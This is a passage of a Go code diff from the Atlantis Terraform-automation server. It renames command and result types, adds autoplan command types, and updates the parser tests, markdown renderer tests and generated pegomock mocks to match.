deepcopy.Copy(Pull).(github.PullRequest) testPull.HTMLURL = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "html_url is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.Head.Ref = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "head.ref is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.User.Login = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "user.login is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.Number = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "number is null", err) - pullRes, _, err := parser.ParseGithubPull(&Pull) + pullRes, actBaseRepo, actHeadRepo, err := parser.ParseGithubPull(&Pull) Ok(t, err) + expBaseRepo := models.Repo{ + Owner: "owner", + FullName: "owner/repo", + CloneURL: "https://github-user:github-token@github.com/owner/repo.git", + SanitizedCloneURL: Repo.GetCloneURL(), + Name: "repo", + VCSHost: models.VCSHost{ + Hostname: "github.com", + Type: models.Github, + }, + } Equals(t, models.PullRequest{ URL: Pull.GetHTMLURL(), Author: Pull.User.GetLogin(), @@ -137,18 +194,10 @@ func TestParseGithubPull(t *testing.T) { HeadCommit: Pull.Head.GetSHA(), Num: Pull.GetNumber(), State: models.Open, - BaseRepo: models.Repo{ - Owner: "owner", - FullName: "owner/repo", - CloneURL: "https://github-user:github-token@github.com/owner/repo.git", - SanitizedCloneURL: Repo.GetCloneURL(), - Name: "repo", - VCSHost: models.VCSHost{ - Hostname: "github.com", - Type: models.Github, - }, - }, + BaseRepo: expBaseRepo, }, pullRes) + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, expBaseRepo, actHeadRepo) } func TestParseGitlabMergeEvent(t *testing.T) { @@ -156,10 +205,10 @@ func TestParseGitlabMergeEvent(t *testing.T) { var event *gitlab.MergeEvent err := json.Unmarshal([]byte(mergeEventJSON), &event) Ok(t, err) - pull, repo, _, err := parser.ParseGitlabMergeEvent(*event) + pull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGitlabMergeEvent(*event) Ok(t, err) - expRepo := models.Repo{ + expBaseRepo := models.Repo{ FullName: "gitlabhq/gitlab-test", Name: "gitlab-test", SanitizedCloneURL: "https://example.com/gitlabhq/gitlab-test.git", @@ -178,14 +227,26 @@ func TestParseGitlabMergeEvent(t *testing.T) { HeadCommit: "da1560886d4f094c3e6c9ef40349f7d38b5d27d7", Branch: "ms-viewport", State: models.Open, - BaseRepo: expRepo, + BaseRepo: expBaseRepo, }, pull) - Equals(t, expRepo, repo) + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, models.Repo{ + FullName: "awesome_space/awesome_project", + Name: "awesome_project", + SanitizedCloneURL: "http://example.com/awesome_space/awesome_project.git", + Owner: "awesome_space", + CloneURL: "http://gitlab-user:gitlab-token@example.com/awesome_space/awesome_project.git", + VCSHost: models.VCSHost{ + Hostname: "example.com", + Type: models.Gitlab, + }, + }, actHeadRepo) + Equals(t, models.User{Username: "root"}, actUser) t.Log("If the state is closed, should set field correctly.") event.ObjectAttributes.State = "closed" - pull, _, _, err = parser.ParseGitlabMergeEvent(*event) + pull, _, _, _, err = parser.ParseGitlabMergeEvent(*event) Ok(t, err) Equals(t, models.Closed, pull.State) } @@ -283,20 +344,20 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false) + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "") Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false) + cmd := events.NewCommand("dir", nil, events.Plan, false, "", "") Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false) - Equals(t, events.Command{ + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project") + Equals(t, events.CommentCommand{ Workspace: "workspace", Dir: "dir", Verbose: true, @@ -306,6 +367,52 @@ func TestNewCommand_AllFieldsSet(t *testing.T) { }, *cmd) } +func TestAutoplanCommand_CommandName(t *testing.T) { + Equals(t, events.Plan, (events.AutoplanCommand{}).CommandName()) +} + +func TestAutoplanCommand_IsVerbose(t *testing.T) { + Equals(t, false, (events.AutoplanCommand{}).IsVerbose()) +} + +func TestAutoplanCommand_IsAutoplan(t *testing.T) { + Equals(t, true, (events.AutoplanCommand{}).IsAutoplan()) +} + +func TestCommentCommand_CommandName(t *testing.T) { + Equals(t, events.Plan, (events.CommentCommand{ + Name: events.Plan, + }).CommandName()) + Equals(t, events.Apply, (events.CommentCommand{ + Name: events.Apply, + }).CommandName()) +} + +func TestCommentCommand_IsVerbose(t *testing.T) { + Equals(t, false, (events.CommentCommand{ + Verbose: false, + }).IsVerbose()) + Equals(t, true, (events.CommentCommand{ + Verbose: true, + }).IsVerbose()) +} + +func TestCommentCommand_IsAutoplan(t *testing.T) { + Equals(t, false, (events.CommentCommand{}).IsAutoplan()) +} + +func TestCommentCommand_String(t *testing.T) { + exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"` + Equals(t, exp, (events.CommentCommand{ + Dir: "mydir", + Flags: []string{"flag1", "flag2"}, + Name: events.Plan, + Verbose: true, + Workspace: "myworkspace", + ProjectName: "myproject", + }).String()) +} + var mergeEventJSON = `{ "object_kind": "merge_request", "user": { diff --git a/server/events/executor.go b/server/events/executor.go index 10df87a764..b308e9d02c 100644 --- a/server/events/executor.go +++ b/server/events/executor.go @@ -18,5 +18,5 @@ package events // Executor is the generic interface implemented by each command type: // help, plan, and apply. type Executor interface { - Execute(ctx *CommandContext) CommandResponse + Execute(ctx *CommandContext) CommandResult } diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index acb0d86791..eb06c4ead7 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -58,7 +58,7 @@ type ProjectResultTmplData struct { // Render formats the data into a markdown string. // nolint: interfacer -func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string { +func (m *MarkdownRenderer) Render(res CommandResult, cmdName CommandName, log string, verbose bool, autoplan bool) string { commandStr := strings.Title(cmdName.String()) common := CommonData{commandStr, verbose, log} if res.Error != nil { @@ -73,10 +73,10 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log return m.renderProjectResults(res.ProjectResults, common) } -func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string { +func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common CommonData) string { var resultsTmplData []ProjectResultTmplData - for _, result := range pathResults { + for _, result := range results { resultData := ProjectResultTmplData{ Workspace: result.Workspace, Dir: result.Path, diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 202097e9be..040c47731e 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -45,18 +45,20 @@ func TestRenderErr(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - Error: c.Error, - } - for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + Error: c.Error, } - } + for _, verbose := range []bool{true, false} { + t.Log("testing " + c.Description) + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + } + }) } } @@ -83,25 +85,27 @@ func TestRenderFailure(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - Failure: c.Failure, - } - for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + Failure: c.Failure, + } + for _, verbose := range []bool{true, false} { + t.Log("testing " + c.Description) + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } } - } + }) } } func TestRenderErrAndFailure(t *testing.T) { t.Log("if there is an error and a failure, the error should be printed") r := events.MarkdownRenderer{} - res := events.CommandResponse{ + res := events.CommandResult{ Error: errors.New("error"), Failure: "failure", } @@ -109,6 +113,15 @@ func TestRenderErrAndFailure(t *testing.T) { Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s) } +func TestRenderAutoplanNoResults(t *testing.T) { + // If there are no project results during an autoplan we should still comment + // back because the user might expect some output. + r := events.MarkdownRenderer{} + res := events.CommandResult{} + s := r.Render(res, events.Plan, "", false, true) + Equals(t, "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n\n", s) +} + func TestRenderProjectResults(t *testing.T) { cases := []struct { Description string @@ -121,9 +134,11 @@ func TestRenderProjectResults(t *testing.T) { events.Plan, []events.ProjectResult{ { - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, Workspace: "workspace", Path: "path", @@ -136,9 +151,11 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - ApplySuccess: "success", - Workspace: "workspace", - Path: "path", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, + Workspace: "workspace", + Path: "path", }, }, "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n", @@ -150,17 +167,21 @@ func TestRenderProjectResults(t *testing.T) { { Workspace: "workspace", Path: "path", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, }, { Workspace: "workspace", Path: "path2", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output2", - LockURL: "lock-url2", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output2", + LockURL: "lock-url2", + }, }, }, }, @@ -171,14 +192,18 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - Path: "path", - Workspace: "workspace", - ApplySuccess: "success", + Path: "path", + Workspace: "workspace", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, }, { - Path: "path2", - Workspace: "workspace", - ApplySuccess: "success2", + Path: "path2", + Workspace: "workspace", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success2", + }, }, }, "Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n", @@ -188,7 +213,9 @@ func TestRenderProjectResults(t *testing.T) { events.Plan, []events.ProjectResult{ { - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, Path: "path", Workspace: "workspace", }, @@ -202,7 +229,9 @@ func TestRenderProjectResults(t *testing.T) { { Path: "path", Workspace: "workspace", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, }, "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n", @@ -214,20 +243,26 @@ func TestRenderProjectResults(t *testing.T) { { Workspace: "workspace", Path: "path", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, }, { Workspace: "workspace", Path: "path2", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, { Workspace: "workspace", Path: "path3", - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, }, }, "Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n", @@ -237,19 +272,25 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - Workspace: "workspace", - Path: "path", - ApplySuccess: "success", + Workspace: "workspace", + Path: "path", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, }, { Workspace: "workspace", Path: "path2", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, { Workspace: "workspace", Path: "path3", - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, }, }, "Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n", @@ -258,18 +299,20 @@ func TestRenderProjectResults(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - ProjectResults: c.ProjectResults, - } - for _, verbose := range []bool{true, false} { - t.Run(c.Description, func(t *testing.T) { - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) - } - }) - } + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + ProjectResults: c.ProjectResults, + } + for _, verbose := range []bool{true, false} { + t.Run(c.Description, func(t *testing.T) { + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + }) + } + }) } } diff --git a/server/events/mocks/matchers/events_commandresponse.go b/server/events/mocks/matchers/events_commandname.go similarity index 53% rename from server/events/mocks/matchers/events_commandresponse.go rename to server/events/mocks/matchers/events_commandname.go index f596b2c4db..448c937abc 100644 --- a/server/events/mocks/matchers/events_commandresponse.go +++ b/server/events/mocks/matchers/events_commandname.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyEventsCommandResponse() events.CommandResponse { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResponse))(nil)).Elem())) - var nullValue events.CommandResponse +func AnyEventsCommandName() events.CommandName { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandName))(nil)).Elem())) + var nullValue events.CommandName return nullValue } -func EqEventsCommandResponse(value events.CommandResponse) events.CommandResponse { +func EqEventsCommandName(value events.CommandName) events.CommandName { pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.CommandResponse + var nullValue events.CommandName return nullValue } diff --git a/server/events/mocks/matchers/events_commandresult.go b/server/events/mocks/matchers/events_commandresult.go new file mode 100644 index 0000000000..54269ef123 --- /dev/null +++ b/server/events/mocks/matchers/events_commandresult.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +func AnyEventsCommandResult() events.CommandResult { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResult))(nil)).Elem())) + var nullValue events.CommandResult + return nullValue +} + +func EqEventsCommandResult(value events.CommandResult) events.CommandResult { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue events.CommandResult + return nullValue +} diff --git a/server/events/mocks/matchers/models_projectcommandcontext.go b/server/events/mocks/matchers/models_projectcommandcontext.go new file mode 100644 index 0000000000..3f76b9a225 --- /dev/null +++ b/server/events/mocks/matchers/models_projectcommandcontext.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnyModelsProjectCommandContext() models.ProjectCommandContext { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.ProjectCommandContext))(nil)).Elem())) + var nullValue models.ProjectCommandContext + return nullValue +} + +func EqModelsProjectCommandContext(value models.ProjectCommandContext) models.ProjectCommandContext { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue models.ProjectCommandContext + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_command.go index 91edd3b663..771aacf306 100644 --- a/server/events/mocks/matchers/ptr_to_events_command.go +++ b/server/events/mocks/matchers/ptr_to_events_command.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyPtrToEventsCommand() *events.Command { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.Command))(nil)).Elem())) - var nullValue *events.Command +func AnyPtrToEventsCommand() *events.CommentCommand { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) + var nullValue *events.CommentCommand return nullValue } -func EqPtrToEventsCommand(value *events.Command) *events.Command { +func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand { pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue *events.Command + var nullValue *events.CommentCommand return nullValue } diff --git a/server/events/mocks/matchers/ptr_to_events_commentcommand.go b/server/events/mocks/matchers/ptr_to_events_commentcommand.go new file mode 100644 index 0000000000..fbbbfcc15c --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_events_commentcommand.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +func AnyPtrToEventsCommentCommand() *events.CommentCommand { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) + var nullValue *events.CommentCommand + return nullValue +} + +func EqPtrToEventsCommentCommand(value *events.CommentCommand) *events.CommentCommand { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *events.CommentCommand + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go new file mode 100644 index 0000000000..1952cf1f74 --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + github "github.com/google/go-github/github" + "github.com/petergtz/pegomock" +) + +func AnyPtrToGithubPullRequestEvent() *github.PullRequestEvent { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*github.PullRequestEvent))(nil)).Elem())) + var nullValue *github.PullRequestEvent + return nullValue +} + +func EqPtrToGithubPullRequestEvent(value *github.PullRequestEvent) *github.PullRequestEvent { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *github.PullRequestEvent + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_models_repo.go b/server/events/mocks/matchers/ptr_to_models_repo.go new file mode 100644 index 0000000000..05ba1aef35 --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_models_repo.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnyPtrToModelsRepo() *models.Repo { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*models.Repo))(nil)).Elem())) + var nullValue *models.Repo + return nullValue +} + +func EqPtrToModelsRepo(value *models.Repo) *models.Repo { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *models.Repo + return nullValue +} diff --git a/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go new file mode 100644 index 0000000000..08974c59cd --- /dev/null +++ b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnySliceOfModelsProjectCommandContext() []models.ProjectCommandContext { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]models.ProjectCommandContext))(nil)).Elem())) + var nullValue []models.ProjectCommandContext + return nullValue +} + +func EqSliceOfModelsProjectCommandContext(value []models.ProjectCommandContext) []models.ProjectCommandContext { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue []models.ProjectCommandContext + return nullValue +} diff --git a/server/events/mocks/mock_command_runner.go b/server/events/mocks/mock_command_runner.go index 481fcf72f5..8ef3387c0d 100644 --- a/server/events/mocks/mock_command_runner.go +++ b/server/events/mocks/mock_command_runner.go @@ -19,9 +19,14 @@ func NewMockCommandRunner() *MockCommandRunner { return &MockCommandRunner{fail: pegomock.GlobalFailHandler} } -func (mock *MockCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) { - params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd} - pegomock.GetGenericMockFrom(mock).Invoke("ExecuteCommand", params, []reflect.Type{}) +func (mock *MockCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) { + params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd} + pegomock.GetGenericMockFrom(mock).Invoke("RunCommentCommand", params, []reflect.Type{}) +} + +func (mock *MockCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) { + params := []pegomock.Param{baseRepo, headRepo, pull, user} + pegomock.GetGenericMockFrom(mock).Invoke("RunAutoplanCommand", params, []reflect.Type{}) } func (mock *MockCommandRunner) VerifyWasCalledOnce() *VerifierCommandRunner { @@ -42,32 +47,32 @@ type VerifierCommandRunner struct { inOrderContext *pegomock.InOrderContext } -func (verifier *VerifierCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) *CommandRunner_ExecuteCommand_OngoingVerification { - params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ExecuteCommand", params) - return &CommandRunner_ExecuteCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +func (verifier *VerifierCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) *CommandRunner_RunCommentCommand_OngoingVerification { + params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunCommentCommand", params) + return &CommandRunner_RunCommentCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } -type CommandRunner_ExecuteCommand_OngoingVerification struct { +type CommandRunner_RunCommentCommand_OngoingVerification struct { mock *MockCommandRunner methodInvocations []pegomock.MethodInvocation } -func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.User, int, *events.Command) { - baseRepo, headRepo, user, pullNum, cmd := c.GetAllCapturedArguments() - return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1] +func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetCapturedArguments() (models.Repo, *models.Repo, models.User, int, *events.CommentCommand) { + baseRepo, maybeHeadRepo, user, pullNum, cmd := c.GetAllCapturedArguments() + return baseRepo[len(baseRepo)-1], maybeHeadRepo[len(maybeHeadRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1] } -func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.Command) { +func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []*models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.CommentCommand) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) for u, param := range params[0] { _param0[u] = param.(models.Repo) } - _param1 = make([]models.Repo, len(params[1])) + _param1 = make([]*models.Repo, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(models.Repo) + _param1[u] = param.(*models.Repo) } _param2 = make([]models.User, len(params[2])) for u, param := range params[2] { @@ -77,9 +82,48 @@ func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArgumen for u, param := range params[3] { _param3[u] = param.(int) } - _param4 = make([]*events.Command, len(params[4])) + _param4 = make([]*events.CommentCommand, len(params[4])) for u, param := range params[4] { - _param4[u] = param.(*events.Command) + _param4[u] = param.(*events.CommentCommand) + } + } + return +} + +func (verifier *VerifierCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) *CommandRunner_RunAutoplanCommand_OngoingVerification { + params := []pegomock.Param{baseRepo, headRepo, pull, user} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunAutoplanCommand", params) + return &CommandRunner_RunAutoplanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type CommandRunner_RunAutoplanCommand_OngoingVerification struct { + mock *MockCommandRunner + methodInvocations []pegomock.MethodInvocation +} + +func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.PullRequest, models.User) { + baseRepo, headRepo, pull, user := c.GetAllCapturedArguments() + return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], pull[len(pull)-1], user[len(user)-1] +} + +func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.PullRequest, _param3 []models.User) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]models.Repo, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(models.Repo) + } + _param1 = make([]models.Repo, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(models.Repo) + } + _param2 = make([]models.PullRequest, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(models.PullRequest) + } + _param3 = make([]models.User, len(params[3])) + for u, param := range params[3] { + _param3[u] = param.(models.User) } } return diff --git a/server/events/mocks/mock_commit_status_updater.go b/server/events/mocks/mock_commit_status_updater.go index 3ed9e933b4..e5815d4144 100644 --- a/server/events/mocks/mock_commit_status_updater.go +++ b/server/events/mocks/mock_commit_status_updater.go @@ -20,8 +20,8 @@ func NewMockCommitStatusUpdater() *MockCommitStatusUpdater { return &MockCommitStatusUpdater{fail: pegomock.GlobalFailHandler} } -func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) error { - params := []pegomock.Param{repo, pull, status, cmd} +func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) error { + params := []pegomock.Param{repo, pull, status, command} result := pegomock.GetGenericMockFrom(mock).Invoke("Update", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 { @@ -32,8 +32,8 @@ func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRe return ret0 } -func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) error { - params := []pegomock.Param{ctx, res} +func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) error { + params := []pegomock.Param{ctx, commandName, res} result := pegomock.GetGenericMockFrom(mock).Invoke("UpdateProjectResult", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 { @@ -62,8 +62,8 @@ type VerifierCommitStatusUpdater struct { inOrderContext 